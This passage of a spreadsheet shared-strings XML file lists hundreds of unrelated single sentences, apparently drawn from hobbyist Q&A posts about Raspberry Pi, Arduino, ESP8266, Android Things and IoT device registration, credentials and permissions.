  </si>
  <si>
    <t>A real-time task in user space still has the benefit of memory protection, but is scheduled by Xenomai directly, and no longer by the Linux kernel.</t>
  </si>
  <si>
    <t>The contact class (CNContact) is a thread-safe, immutable value object of contact properties, such as the contacts name, image, or phone numbers.</t>
  </si>
  <si>
    <t>The official Google Assistant SDK guide was just updated (yesterday) so I can't find any other reports of this error, but the command to register a device using the registration tool is giving me some issues.</t>
  </si>
  <si>
    <t>Running Docker with the "--privileged" option
Starting a container like this will give the container full access to the host's devices, including GPIO:
Check the Docker documentation on this option.</t>
  </si>
  <si>
    <t>Safeguard AWS Credentials
When you use Amazon Cognito, the service takes care of all the steps necessary to create a unique identifier for your apps users and retrieve temporary, limited privilege AWS credentials.</t>
  </si>
  <si>
    <t>Basic instructions for FTP server for Raspberry PI can be found here: http://www.instructables.com/id/Raspberry-Pi-Web-Server/step9/Install-an-FTP-server/
Side note:
SFTP might be easier as it will just use the same port as SSH.</t>
  </si>
  <si>
    <t>The provisioning service doesn't care which entity is the ultimate root of trust for the certificates your device clients present, but you will have to go through a proof of possession step to show you have access to the private portion of the signing cert when using an enrollment group.</t>
  </si>
  <si>
    <t>It was asking me for a password for user git at one time but does not anymore.</t>
  </si>
  <si>
    <t>Sometimes (very rarely), I can't login at all and my only option is to reboot my device.</t>
  </si>
  <si>
    <t>This is KOM0640 (Quer) model, successfully detected by Linux Kernel mt7601Usta.ko module.</t>
  </si>
  <si>
    <t>I can successfully log in, but when I run ifconfig, it only shows the lo interface (eth0 does not show up at all).</t>
  </si>
  <si>
    <t>I have an Arduino Uno that is successfully registered as a device with IBM IoTF.</t>
  </si>
  <si>
    <t>When the system is restored, the cookie cannot be read.</t>
  </si>
  <si>
    <t>I enrolled my android device successfully.</t>
  </si>
  <si>
    <t>The ALT key does gets registered as the option key.</t>
  </si>
  <si>
    <t>I would appreciate it if someone can read the following codes.</t>
  </si>
  <si>
    <t>Just need to figure out the patch for the webstream authentication.</t>
  </si>
  <si>
    <t>The certificate has not yet been activated
Gives it away.</t>
  </si>
  <si>
    <t>You will see it in IoT Hub after registering successfully.</t>
  </si>
  <si>
    <t>The firmware flashes the Digital Pin 13 LED, so I know that the firmware is running.</t>
  </si>
  <si>
    <t>I had assumed that the RaspPi could detect iBeacons.</t>
  </si>
  <si>
    <t>In my opinion error should be discovered during verifying in Arduino IDE.</t>
  </si>
  <si>
    <t>I understand that giving sudo acccess to the www-data user is a security risk.</t>
  </si>
  <si>
    <t>So I am not sure what to next, how to make Mac detect my board and burn my .hex on it.</t>
  </si>
  <si>
    <t>But when we  trying to connect our android phone to API then raspberry pi is not detected.</t>
  </si>
  <si>
    <t>For me it seems that the first instruction for saving the key goes ok, although I don't know how to verify it.</t>
  </si>
  <si>
    <t>How can I verify the flash size?</t>
  </si>
  <si>
    <t>One of the things it does is reset the network settings.</t>
  </si>
  <si>
    <t>I have been trying to connect my Intel Edison running Android things to the Wifi.</t>
  </si>
  <si>
    <t>What is working: Flashing works and i can get the Chip ID and MAC address (using esptool).</t>
  </si>
  <si>
    <t>I have also written a python code to verify the password.</t>
  </si>
  <si>
    <t>Device is successfully enrolled with the IoT server.</t>
  </si>
  <si>
    <t>The folder has read-write permissions for everyone.</t>
  </si>
  <si>
    <t>Here is a DTS fragment example for SPI1:
Which kernel driver should I look into to verify?</t>
  </si>
  <si>
    <t>With mutex or read-write lock?</t>
  </si>
  <si>
    <t>/**
 *  @brief      Load and verify DMP image.</t>
  </si>
  <si>
    <t>I already had a problem with one raspberry, and i think it's getting dangerous for the application.</t>
  </si>
  <si>
    <t>I'm trying to register a device using the tutorial at the LINK HERE.</t>
  </si>
  <si>
    <t>I am trying to connect to my "thing" i.e Raspberry Pi registered in my AWS account using node.js.</t>
  </si>
  <si>
    <t>I am using node noble (1.8.1) module for detecting beacons.</t>
  </si>
  <si>
    <t>i successfully connected remotely and wrote the code.</t>
  </si>
  <si>
    <t>Following is my code:
I am sure that the credentials are correct.</t>
  </si>
  <si>
    <t>There is indeed a file /home/joe/.aws/credentials that contains the correct credentials.</t>
  </si>
  <si>
    <t>Now I have no issues flashing the firmware onto the Atmel MCU.</t>
  </si>
  <si>
    <t>The aim is to decode rssi and uuid sent from a BLE beacon.</t>
  </si>
  <si>
    <t>You are using the MIFARE Classic authentication function for authenticatication with a MIFARE Ultralight C chip.</t>
  </si>
  <si>
    <t>That means that I can programmatically send keystrokes to an Android via USB.</t>
  </si>
  <si>
    <t>Probably the group has permissions to read/write the device.</t>
  </si>
  <si>
    <t>ethernet connection is via a cable), while ~/11287 is a WiFi shield that is used on a generic Arduino board and connects to the internet.</t>
  </si>
  <si>
    <t>Which provides the real-time guarantee.</t>
  </si>
  <si>
    <t>I would start by writing it to debug.writeline to verify.</t>
  </si>
  <si>
    <t>Set/read the channel verification setting.</t>
  </si>
  <si>
    <t>If you want to check if at least one gun is detected, you could write: .</t>
  </si>
  <si>
    <t>Add read/write permissions for every user to that device file.</t>
  </si>
  <si>
    <t>To verify this, you can run the aapt tool manually.</t>
  </si>
  <si>
    <t>You need to run the PCD_Authenticate function before reads and writes.</t>
  </si>
  <si>
    <t>If you setup your ESP8266 as an Access Point then other devices will be able to connect to it by getting onto that Access Point.</t>
  </si>
  <si>
    <t>Now you have essentially hijacked the data via Ethernet.</t>
  </si>
  <si>
    <t>For a preview, take a look at this video from Build where we demo'd firmware update on the Intel Edison.</t>
  </si>
  <si>
    <t>With this
  approach, there should never be a need to manually feed the system
  watchdog.</t>
  </si>
  <si>
    <t>Just keep that in mind that you will have to register some tags and will provide access to them.</t>
  </si>
  <si>
    <t>This will scan for beacons, including iBeacons and also AltBeacons.</t>
  </si>
  <si>
    <t>The key point here is Detect features, not OS or devices.</t>
  </si>
  <si>
    <t>To store WiFi credentials and IP settings, you would use SPIFFS.</t>
  </si>
  <si>
    <t>Your device probably used the WiFi credentials it used last time i.e.</t>
  </si>
  <si>
    <t>You are using  incorrectly, you must register your deferal and notifiy when it is complete.</t>
  </si>
  <si>
    <t>The WIoTP isn't actually hosting the firmware to be downloaded.</t>
  </si>
  <si>
    <t>For the device to download the firmware over MQTT would mean that the firmware would have had to be uploaded to the WIoTP somewhere.</t>
  </si>
  <si>
    <t>As I understand, you do not want your code / database to be read through any file access protocol.</t>
  </si>
  <si>
    <t>The only thing that you can change is how the user provides that credentials.</t>
  </si>
  <si>
    <t>If no register is specified, it operates on 0x00 register.</t>
  </si>
  <si>
    <t>Before flashing firmware, please hold FLASH button, and press RST button once.</t>
  </si>
  <si>
    <t>On Android Things, you can still do anonymous auth and email/password auth.</t>
  </si>
  <si>
    <t>Everything else that they tell you to patch has now been patched in Raspbian by default, or so it seems.</t>
  </si>
  <si>
    <t>Now turn off your RPi3 and unplug the ethernet cable.</t>
  </si>
  <si>
    <t>When one registers a receiver, one must also unregister.</t>
  </si>
  <si>
    <t>However, as you probably know, the need for firmware OTA is much lower with the NodeMCU firmware than e.g.</t>
  </si>
  <si>
    <t>Another thing that worked for us is using a previously authenticated Google Account.</t>
  </si>
  <si>
    <t>Setting up the pi
We will need to do two things: activate ssh on the pi, and configure the pi to use a static ip.</t>
  </si>
  <si>
    <t>From then on those credentials will be used to auto login.</t>
  </si>
  <si>
    <t>In case of Arduino boards is then the firmware the bootloader and the firmware in the USB chip.</t>
  </si>
  <si>
    <t>It enables users to register using the Facebook API.</t>
  </si>
  <si>
    <t>Usually this is obtained from the /etc/passwd and the /etc/shadow file as well if shadow is enabled.</t>
  </si>
  <si>
    <t>Register and unregister routes programmatically.</t>
  </si>
  <si>
    <t>However, declaring the permission implies intention to use the API and the user of the device can grant permission through the Settings application.</t>
  </si>
  <si>
    <t>For example, to set the permissions to read and write, we will use 6 (4 + 2) for the permission.</t>
  </si>
  <si>
    <t>For the experiment I'm using firebase-admin, and have the same credentials (for now) on my Raspberry Pi and Mac, which I have painstakingly verified.</t>
  </si>
  <si>
    <t>For intrusion detection systems, use [intrusion-detection].</t>
  </si>
  <si>
    <t>For intrusion detection systems, use intrusion-detection.</t>
  </si>
  <si>
    <t>Naturally, the USB debugging setting needs to be activated on the respective device.</t>
  </si>
  <si>
    <t>Cross Platform
Unlike other wrappers such as OpenCVDotNet, SharperCV or Code Project which use unsafe code, Emgu CV is written entirely in C#.</t>
  </si>
  <si>
    <t>The only mentioning of hashing for azure-iot-sdk-c, is through the use of hsm_client_sign_with_identity, for custom HSM, the documentation can be found here.</t>
  </si>
  <si>
    <t>Gives the following error
The next example (like most of the others) gives a 'Device id invalid, out of range.'</t>
  </si>
  <si>
    <t>I followed the exact steps in https://docs.microsoft.com/en-us/azure/iot-dps/tutorial-net-provision-device-to-hub to register the device.</t>
  </si>
  <si>
    <t>Where you can then also use the internal BOD to prevent corruption, before it falls below safe writing voltages.</t>
  </si>
  <si>
    <t>Linux Instructions
Example Code - Found on SO
The example uses , which is "safe", but can be hard to show.</t>
  </si>
  <si>
    <t>The boot log has these messages about fbtft_device:
fbtft_device:  SPI devices registered:
fbtft_device:      spidev spi0.0 500kHz 8 bits mode=0x00
fbtft_device:      spidev spi0.1 500kHz 8 bits mode=0x00
fbtft_device:  'fb' Platform devices registered:
fbtft_device:      bcm2708_fb id=-1 pdata?</t>
  </si>
  <si>
    <t>Just one last thing, I already know that ibeacons are not the best at finding location inside but it is all I have and I can't afford to change to some other way.</t>
  </si>
  <si>
    <t>I also tried to set the permissions for the chromium preferences file to read only, but permissions seem to be restored on boot.</t>
  </si>
  <si>
    <t>I can't seem to find what the "proper" way to launch an app startup is on linux, i need to launch a mono app on startup on my raspberries (whenever the system is done loading, whatever that might mean in linux, and NOT on user logon, no one will be actively logging to the system).</t>
  </si>
  <si>
    <t>Everything works well, except one thing: I need to login to redash (website with charts) from my screenly raspberry, but when I try to input my login and password data from UZBL browser, which is pre-installed with screenly, keyboard input does not work.</t>
  </si>
  <si>
    <t>All in all, I want to reproduce the following, which gives me a device code in less than a second:
curl https://graph.facebook.com/v2.7/device/login -d
  "type=device_code&amp;access_token=MYTOKEN"
I set up the following sketch which works albeit very slowly.</t>
  </si>
  <si>
    <t>Because of leak of tech-support of iBeacons Technology, I can't find any docs about how to search iBeacons signal source.</t>
  </si>
  <si>
    <t>*
 * When gpiochip_add() is called very early during boot, so that GPIOs
 * can be freely used, the chip-&gt;dev device must be registered before
 * the gpio framework's arch_initcall().</t>
  </si>
  <si>
    <t>I need some help from you all actually after 10 days of leave i am back with my work and i found there are some changes in aws iot console for registering a device(thing) on aws iot.</t>
  </si>
  <si>
    <t>I have been able to successfully configure the gpio-keys where it registers input device events upon receiving an interrupt.</t>
  </si>
  <si>
    <t>To be sure about if file open causing out of mem problem due to its garbage content, you can delete it first and re-write the credentials.</t>
  </si>
  <si>
    <t>If you have rebooted and the Permissions issue(s) still exist, do the following steps:
Reboot
Connect via adb: adb connect Android.local:5555
Uninstall the apk:  adb uninstall (you package name)
reboot
install your apk
reboot
Happy Coding!</t>
  </si>
  <si>
    <t>In the code, you need to note that:
Use DEVICE ID in IoT Hub as clientId in the connection option;
Use mqtts protocol;
For the username option, use {iothubhostname}/{device_id}/api-version=2016-11-14, where {iothubhostname} is the full CName of the IoT hub.</t>
  </si>
  <si>
    <t>Given attributes allow to forget about imperative way of step-by-step verification of validation conditions in many cases.</t>
  </si>
  <si>
    <t>Copyright law gives exclusivity of the rights to copy, distribute and modify a work to its creator for a given period of time, in the interest of getting such a work disclosed to the public.</t>
  </si>
  <si>
    <t>I have the following code, and the StopWatch object, when I try to restart it, it throws this exception:
Attempted to read or write protected memory.</t>
  </si>
  <si>
    <t>currently I'm working on a nodemcu/esp8266 project which connects over wifi to an accesspoint and then periodically reads (GETs) data from a custom REST service using http basic authentication and subsequentially an API key (not implemented yet).</t>
  </si>
  <si>
    <t>In this case, iOS will show the pairing dialog and complete the pairing process when the app attempts to read the encrypted characteristic.</t>
  </si>
  <si>
    <t>Sounds dumb, but if you are copying your credentials (I did so when following the online tutorial), it might introduce a space character before them in node-red.</t>
  </si>
  <si>
    <t>In HMM, the hidden state variable cannot be observed, but usually some output variable that dependent on the hidden state is visible.</t>
  </si>
  <si>
    <t>I'm looking for a fast and easy method to remote shell to my raspberry pi (with out password require and encrypted like ssh ) because my project require running simple command to raspberry pi many times / a second, any suggest ideas?</t>
  </si>
  <si>
    <t>Since I was not able to get rid of all the log messages (i got rid of most), the tty login screen, the attempts of connecting to the network (although the Model 1 A does not have ethernet at all) booting was ugly and took long (+1 minute in some cases).</t>
  </si>
  <si>
    <t>I am working on a project where an Arduino will send measurements and receive commands through an Ethernet interface and a REST API to open and lock a door.</t>
  </si>
  <si>
    <t>For the case of browsing a "what is my public IP" website, I would just advise to browse the http:// version instead, since the response is not confidential information.</t>
  </si>
  <si>
    <t>What you could do to check errors is to use gcloud:
The devices describe command may show additional error messages that can be used to help debug, including to verify that your device's credentials are not expired.</t>
  </si>
  <si>
    <t>This is the lua function and it works fine
It all works but my output file is something like
So I inserted values to separate fields like 
 file.write(wifi_ssid)
 file.write(":")
 file.write(wifi_password)
and many other ways like this but my code does not work on my ESP8266 because I get not enough memory error but if I don't print the : I have something like 10 kb free.</t>
  </si>
  <si>
    <t>I suspect this is a problem that already has a "stock" solution; I need to deploy an ESP8266 device such that it will be able to connect to a secured local WiFi, but I can't know the credentials at the time the software is embedded on the device.</t>
  </si>
  <si>
    <t>The fingerprint template I extracted looks like:
Attempting to load #2 
  Template 2 loaded Attempting to get #2 Template
  2 transferring: 495 bytes read.</t>
  </si>
  <si>
    <t>What you are describing should be possible, but it would be a custom beacon implementation and would not be a true iBeacon -- iBeacons do not report service characteristics or send anything other than their three part identifier.</t>
  </si>
  <si>
    <t>Alright, after struggling against PhoneGap CLI with issues related to Build Tools version, and some other stuff, I've managed to build and deploy on Android the .apk, once there, and ONLY WHEN OTG CABLE WAS PLUGGED AND ARDUINO DETECTED BY ANDROID (info for cordovarduino users), permissions where asked and eureka!</t>
  </si>
  <si>
    <t>I can think of two options:
EASIER:
Blacklist the kernel module inside /etc/modprobe.d/blacklist.conf by adding:
Make sure that you do this as root by using sudo or logging in as root, otherwise this file is read-only.</t>
  </si>
  <si>
    <t>Try with rebooting AT device because  
Dangerous permissions requested by apps are not granted until the next device reboot.This includes new app installs and new  elements in existing apps.</t>
  </si>
  <si>
    <t>The reason you are seeing the  is due to the following known issue listed on the release notes:
Dangerous permissions requested by apps are not granted until the next device reboot.</t>
  </si>
  <si>
    <t>As a side note, the developer images for Android Things are built as userdebug, which means you can access root from the shell by simply rebooting the ADB daemon with the adb root command before you attempt to access the shell.</t>
  </si>
  <si>
    <t>There are two Google people APIs:
The new Google People API lets you list authenticated users' contacts and retrieve profile information for authenticated users and their contacts.</t>
  </si>
  <si>
    <t>Android rooting is the process of allowing users of smartphones, tablets, and other devices running the Android mobile operating system to attain privileged control (known as "root access") within Android's subsystem.</t>
  </si>
  <si>
    <t>Regarding issues encountered during the current preview, the following excerpt is from the Release Notes:
Dangerous permissions requested by apps are not granted until the next device reboot.</t>
  </si>
  <si>
    <t>In order to upload file to Google drive, I'm using this tutorial:
https://developers.google.com/drive/web/quickstart/quickstart-python
This script is basically working good, but, it's require manual authorization of the request - EACH time.</t>
  </si>
  <si>
    <t>To the pulseaudio config file /etc/pulse/daemon.conf i have edited the following line:
default-sample-channels = 6
Furthermore i have added the following line to /etc/pulse/default.pa
set-card-profile 2 output:analog-surround-51
load-module module-native-protocol-tcp auth-ip-acl=127.0.0.1 # IP of l$
But i am not sure it has any effect at all.</t>
  </si>
  <si>
    <t>To solve needing sudo--
edit /etc/udev/rules.d/99-com.rules
And paste this script at the bottom of the file:
Stolen from: https://alexconesa.wordpress.com/2017/08/14/udev-failed-to-write-to-sysclassinputmiceuevent-check-that-you-have-permission-to-access-input-devices-on-raspberry-pi/
The other problem is Java's way of falling flat on it's face, often due to a bug.</t>
  </si>
  <si>
    <t>I check the script, in fact it will finally call docker as next:
a) make BUILD_IN_DOCKER=1 BOARD=stm32f4discovery all
b) make BUILD_IN_DOCKER=1 BOARD=stm32f4discovery flash
They are nearly same, and the main use for container is just to build the source to stm32 binary as it's not add any permissions to control hardware when start container.</t>
  </si>
  <si>
    <t>Many options are available to refine socats behaviour:
terminal parameters, open() options, file permissions, file and process owners,
basic socket options like bind address, advanced socket options like IP source
routing, linger, TTL, TOS (type of service), or TCP performance tuning.</t>
  </si>
  <si>
    <t>I successfully enrolled to wso2 iot server with my Android( 6.0.1) device( Samsung SM-G900FQ).</t>
  </si>
  <si>
    <t>Why is it asking me for the password when I already gave the credentials?</t>
  </si>
  <si>
    <t>But actually I am struggling now, to get the sdp_Record.xml registered.</t>
  </si>
  <si>
    <t>To register a new application, do the following:
Go to the Google Cloud Console.</t>
  </si>
  <si>
    <t>Without it, I had to click on the text box, and then the code would finally register.</t>
  </si>
  <si>
    <t>This command: mplayer http://www.polskastacja.pl/play/hiphop.pls is valid via ssh and stream is played.</t>
  </si>
  <si>
    <t>I also enabled the ssh and I used it to login from one Raspberry to all the other Raspberrys.</t>
  </si>
  <si>
    <t>I am currently trying to get the Ethernet Shield working on my Mega.</t>
  </si>
  <si>
    <t>Also, noticed that my Samsung S5 gets detected by ADB on the Pi (without powered USB).</t>
  </si>
  <si>
    <t>I am having a hard time configuring the ethernet shield.</t>
  </si>
  <si>
    <t>I tried to get the device to show up to then be able to install the NodeMCU firmware.</t>
  </si>
  <si>
    <t>But i understand that it's not a very secure option.</t>
  </si>
  <si>
    <t>I am able to authenticate user successfully and I am able get the credentials.</t>
  </si>
  <si>
    <t>Most of the following code is based on the example of Adafruit which are enrolling, show_fingerprint_template, fingerprint and https://forums.adafruit.com/viewtopic.php?t=33229&amp;start=195.</t>
  </si>
  <si>
    <t>I successfully registered the IRQ, and the IRQ is working.</t>
  </si>
  <si>
    <t>You need to give PHP write permissions to the file</t>
  </si>
  <si>
    <t>Maybe this is because the intermediate CA certificate is in state 'verified' in IoTHub.</t>
  </si>
  <si>
    <t>You'll need to call  to get the ESP to not save the credentials.</t>
  </si>
  <si>
    <t>Here are some other options I can think of:
1) Detect when you have already connected to a device on the raspberry pi and not broadcast the service so once you are connected to a device another device cant also connect and cause issues.</t>
  </si>
  <si>
    <t>Actually i can register the beacons using the script Python (from https://github.com/google/beacon-platform/tree/master/samples/python).</t>
  </si>
  <si>
    <t>Another option is for a python script to SSH into the server, list the contents of a directory and then download.</t>
  </si>
  <si>
    <t>UNLESS you are some sort of genius hacker who can do weird stuff!</t>
  </si>
  <si>
    <t>(Android 23 and higher) Dangerous permissions can give the app access to the user's confidential data.</t>
  </si>
  <si>
    <t>And one more thing, is what is HID (usb hid) and why we need it?</t>
  </si>
  <si>
    <t>We use ultrasonic sensor to detect the intrusion which works on connecting with arduino board.</t>
  </si>
  <si>
    <t>I thought it is because I did not grant read and write permissions on my usb port (ttyACM0).</t>
  </si>
  <si>
    <t>When I run 
fs.writeFileSync('/sys/class/gpio/gpio2/value',0);
I get an EPERM error, which if I understand correctly, is telling me that I don't have the correct permissions to write to that file.</t>
  </si>
  <si>
    <t>I have set the permissions so that anyone can read/write by using
This is my HTML/php code:
There is no response whatsoever.</t>
  </si>
  <si>
    <t>I would like to know if it is possible to run the OpenCV HOG Detector using a Raspberry Pi in real time using the Raspberry Pi camera.</t>
  </si>
  <si>
    <t>I know .Js isn't so secure but its a demo so security not important at this point any help appreciated</t>
  </si>
  <si>
    <t>Please check that you've properly flashed the board with the correct firmware.</t>
  </si>
  <si>
    <t>Specification of my Raspberry:
Latest Linux Raspbian distro with kernel 3.12.35+
WiFi dongle 148f:7601 Ralink Technology, Corp.
WiFi dongle is successfuly detected and can be used as client (connect with available access points).</t>
  </si>
  <si>
    <t>I am trying to send a command to my Raspberry Pi using an Android App with SSH.</t>
  </si>
  <si>
    <t>Here is my code, I have also included internet permission in android manifest.</t>
  </si>
  <si>
    <t>https://spring.io/guides/gs/securing-web/
I can run the project by running it as an application.</t>
  </si>
  <si>
    <t>What I did so far was to create an Android app which scans for BLE devices.</t>
  </si>
  <si>
    <t>As I understand for this task I can use TPM (Trusted Platform Module) chip (that I can integrate with RaspberryPi using extension board) and tpm-luks.</t>
  </si>
  <si>
    <t>Access those messages in real-time on a remote device (Arduino Yun) you're SSH'ed into?</t>
  </si>
  <si>
    <t>I searched on Google how to do that, but it was only about people with an ethernet shield.</t>
  </si>
  <si>
    <t>Adding certificate verification is strongly advised.</t>
  </si>
  <si>
    <t>3)I can write a blank module, which can be compiled and registered in system.</t>
  </si>
  <si>
    <t>I know that it needs some firmware to write and install, like smart.js.</t>
  </si>
  <si>
    <t>I assume I need to give normal user permission for the usb device.</t>
  </si>
  <si>
    <t>I know that they will lock up in whatever state they're currently in when the firmware breaks.</t>
  </si>
  <si>
    <t>I have previously used an AudioQueue to play these packets, so they are valid.</t>
  </si>
  <si>
    <t>One nodemcu is wireless acces point and another nodemcu connects to access point as client.</t>
  </si>
  <si>
    <t>What we need to do
We need to detect both the presence and absence of an RFID chip.</t>
  </si>
  <si>
    <t>See https://tutorials.pieterjan.pro/?a=Webdesign_Hosting_ExternHosten_HTTPS_SSL_SQL-TLS&amp;lang=nl
I already installed a certificate from Let's Encrypt for pieterjan.pro.</t>
  </si>
  <si>
    <t>Any ideas on where to look to figure out what's happening and how to get my device registered?</t>
  </si>
  <si>
    <t>What I really worry is: 
Other than the Raspberry Pi, is there any risk to my other devices inside same local network?</t>
  </si>
  <si>
    <t>so that no one is able to read and write code just like we locked other small microcontrollers(AVR/PIC).Please help to do that.</t>
  </si>
  <si>
    <t>In my network config file I have
auto eth0
iface eth0 inet manual
auto eth1
iface eth1 inet manual
Is there some setting to allow connection through both of them at the same time?</t>
  </si>
  <si>
    <t>Once locked, it needs to stay locked for X time.</t>
  </si>
  <si>
    <t>Libraries like gst-omx (RaspiVideo), libsrtp (encryption), libwebrtc (echocanceling) (0.1 in repo to old - so manually downloaded 0.3) are build as well.</t>
  </si>
  <si>
    <t>I could either remove the 'authentication' or re-write the program in its' entirety and flash it.</t>
  </si>
  <si>
    <t>Although I have in my  the permission:
I get the exception:
java.lang.SecurityException: Caller lacks required permission com.google.android.things.permission.MANAGE_INPUT_DRIVERS
Anybody got working this permission on 0.5.1?</t>
  </si>
  <si>
    <t>I am trying to program my NodeMCU (Lolin v3) board in such a way that I can use it to configure the WiFi settings without having to hard code the credentials.</t>
  </si>
  <si>
    <t>I wrote some codes to verify and the result seems to be ideal.</t>
  </si>
  <si>
    <t>But the problem seems to be that the android phone is detected by the mifare module as well as by the NFC module.</t>
  </si>
  <si>
    <t>[2018-3-4 14:29:38]
  Loading 1 accessories...
  /usr/lib/node_modules/homebridge/lib/api.js:64
        throw new Error("The requested accessory '" + name + "' was not registered by any plugin.</t>
  </si>
  <si>
    <t>Now the Assistant responds, "Actually there are some basic settings that need your permission first.</t>
  </si>
  <si>
    <t>I want write script for detecting which pin is connected with which one.</t>
  </si>
  <si>
    <t>How can I achieve root in my Android Things device?</t>
  </si>
  <si>
    <t>I can't figure out though how VS2017 is able to deploy it (without credentials, I may add!).</t>
  </si>
  <si>
    <t>Has anyone ever build the Android Agent application so that the device can be registered as a COPE-Device?</t>
  </si>
  <si>
    <t>The given credentials do not authorize you to view this directory or page.</t>
  </si>
  <si>
    <t>I don't know how to get the credentials for iotedge to download my module.</t>
  </si>
  <si>
    <t>I successfully established a tcp connection between my pc and raspberry pi.</t>
  </si>
  <si>
    <t>I am succesfully able to connect to my raspberry running raspbian stretch lite via ssh on my home network.</t>
  </si>
  <si>
    <t>So I would like to know wich certificate is used by the OS, extract it and manually use it with my HttpURLConnection to ask for date and time BEFORE the OS.</t>
  </si>
  <si>
    <t>I am not so familiar with basic encryption and should probably read up on that.</t>
  </si>
  <si>
    <t>However, Android devices come up with Failed to obtain IP Address and won't connect.</t>
  </si>
  <si>
    <t>avr-gcc -Wall -pedentic [...] tells me no error nor warning
avrdude tells me all bytes have been verified.</t>
  </si>
  <si>
    <t>I am trying to detect intrusions on a CAN bus configuration.</t>
  </si>
  <si>
    <t>When I write a command  on raspberry-pi 3+, it works, but when I try to do it on raspberry-pi zero, it returns: Illegal instruction.</t>
  </si>
  <si>
    <t>Sadly, I don't understand how it could help, but maybe you do:
The device is being recognized on my system
$ lsusb 
Bus 002 Device 012: ID 03eb:2103 Atmel Corp. JTAG ICE mkII
It's also not behind any USB hub.</t>
  </si>
  <si>
    <t>This change to the Setup method in the ADK demokit sketch allowed the connection to be registered and for the app to do its other nifty things.</t>
  </si>
  <si>
    <t>I know that Wifi shields do exist for arduino, but you can't just use any old ethernet shield.</t>
  </si>
  <si>
    <t>You can try to set read and write permissions for all (chmod 777 directory -R).</t>
  </si>
  <si>
    <t>Python calls the function as many times as it has been registered.</t>
  </si>
  <si>
    <t>You don't need to authenticate a write/read of an ultralight NFC tag.</t>
  </si>
  <si>
    <t>i'm sorry but all the atmega chip i know won't give an Unique ID, but the series xmega does (but then you are really far from arduino).</t>
  </si>
  <si>
    <t>TFS online supports basic auth for alternate credentials but it appears you can't use this on prem (yet).</t>
  </si>
  <si>
    <t>An iOS device, for example, exposes a very sophisticated BLE API.</t>
  </si>
  <si>
    <t>Instead, you need to remove the RF shielding case to see the chip.</t>
  </si>
  <si>
    <t>BLUNO is based on the TI CC2540, which can scan for bluetooth devices if flashed with custom firmware.</t>
  </si>
  <si>
    <t>The disadvantage of this approach is that if no beacons are detected at all, your code will block on the  statement.</t>
  </si>
  <si>
    <t>ntpd uses tested algorithms written with reliability in mind.</t>
  </si>
  <si>
    <t>I think you don't have permissions to read/write the serial port device.</t>
  </si>
  <si>
    <t>Dowsides:
Your camera is now a public device rather than an iOS locked device (if that's what you're looking for)
You will have to most likely be connected to a network unless the camera has it's own DHCP server as well; which complicates things slightly further.</t>
  </si>
  <si>
    <t>Effectively, this gives you a signature of the firmware.</t>
  </si>
  <si>
    <t>I would like to mention here that SIM900A works in some specific countries only and wont register on many networks.</t>
  </si>
  <si>
    <t>so i can't explain all of the stuff you need to know, but with this Site you should be able to register to you PBX.</t>
  </si>
  <si>
    <t>Program the credentials once and then remove credential code.</t>
  </si>
  <si>
    <t>You can observe dmesg command output to see how your board is detected.</t>
  </si>
  <si>
    <t>Also, as Blurry Sterk already mentioned, you have the WiFi reset button which can reset the Wifi settings to default.</t>
  </si>
  <si>
    <t>I think that the problem it solve with a ethernet shield r3 but I have not tried that.</t>
  </si>
  <si>
    <t>RPIs can be shared internet only by using Ethernet crossover cable.</t>
  </si>
  <si>
    <t>While it's technically possible to write Arduino firmware in binary, this would be extraordinarily tedious.</t>
  </si>
  <si>
    <t>You mobile broadband key should now be activated and the raspberry should automatically connect to it at start.</t>
  </si>
  <si>
    <t>You need to read over the docs on locking the chip.</t>
  </si>
  <si>
    <t>I think this is likely to be something to do with the security settings on the laptop but Windows isn't my thing sorry.</t>
  </si>
  <si>
    <t>(Search for VCAP_SERVICES)
What you also can do is just obtain the credentials from the Bluemix UI and use them accordingly.</t>
  </si>
  <si>
    <t>We dont want the player to cheat and be able to do other gestures, so we only want to detect real tennis like gestures.</t>
  </si>
  <si>
    <t>In Linux, check the permissions on the tty device () to ensure that you have read/write access to it.</t>
  </si>
  <si>
    <t>Pin 10 is also used for the Ethernet Shield CS pin.</t>
  </si>
  <si>
    <t>Android (and therefore Android Things) does not allow applications to run as the root user for security reasons.</t>
  </si>
  <si>
    <t>I verified this after buying an SPI compatible sensor and reading data from it.</t>
  </si>
  <si>
    <t>You may check chip and replace chip.</t>
  </si>
  <si>
    <t>Android Things (as Android) does not allow to execute shell commands by security reasons.</t>
  </si>
  <si>
    <t>However, if it does still not work, change the permissions to (Read, Write, Execute - For everyone).</t>
  </si>
  <si>
    <t>I don't see a point of not using SSH merely because RPI act as as Wireless access point.</t>
  </si>
  <si>
    <t>On AndroidThings, it is easier to provide the authentication credentials in an Android Resource.</t>
  </si>
  <si>
    <t>If thats fine but you still cant load then you might have corrupted the bootloader.</t>
  </si>
  <si>
    <t>Try to use at commands such as cband, cops, creg, and csca to manually register to network.</t>
  </si>
  <si>
    <t>At least when I read over it the last time it sounded like it would be able to list all conncted devices.</t>
  </si>
  <si>
    <t>In this case, you could try to off the Use a proxy server option in Settings-&gt;Network-&gt;Proxy.</t>
  </si>
  <si>
    <t>Access keys are read-only in Bitbucket, so if/when the private key is compromised then the attacker will be able to read (but not modify) the code.</t>
  </si>
  <si>
    <t>Another option is to setup Wi-Fi access point on your laptop and allow the Pi to connect to it.</t>
  </si>
  <si>
    <t>FINAL STEP : Enter the credentials like below.</t>
  </si>
  <si>
    <t>the correlation to the defined enrollment in the portal is done using the certificate the device uses when it registers.</t>
  </si>
  <si>
    <t>Systems Manager
register your pi with AWS Systems Manager
once it's registered, you can run shell scripts on your pi using the RunCommand api.</t>
  </si>
  <si>
    <t>In my case, my raspberry pi 3's date and time settings were incorrect and therefore SSL certificate error was coming.</t>
  </si>
  <si>
    <t>You may be able inspect the HTTP server logs to verify this.</t>
  </si>
  <si>
    <t>A one-time pad uses a different encryption key every time.</t>
  </si>
  <si>
    <t>It provides offline encrypted storage on Android and iOS devices with an natural JavaScript API.</t>
  </si>
  <si>
    <t>You need to generate a YouTube Data API Developer Key to access the content available on YouTube Data API.</t>
  </si>
  <si>
    <t>Multi-account support : up to 10 accounts can be activated at the same time.</t>
  </si>
  <si>
    <t>After you have the client registered the next step is to get an authentication token.</t>
  </si>
  <si>
    <t>You need either a free or commercial API key to access the API.</t>
  </si>
  <si>
    <t>Concerning the use of iTextG on Android: Android 4.0 (and higher) changed how it uses Certificates: The KeyChain API will not allow SpongyCastle from getting a certificate (at the time of writing: September 2013).</t>
  </si>
  <si>
    <t>malware that activates at a certain time is called a "logic bomb."</t>
  </si>
  <si>
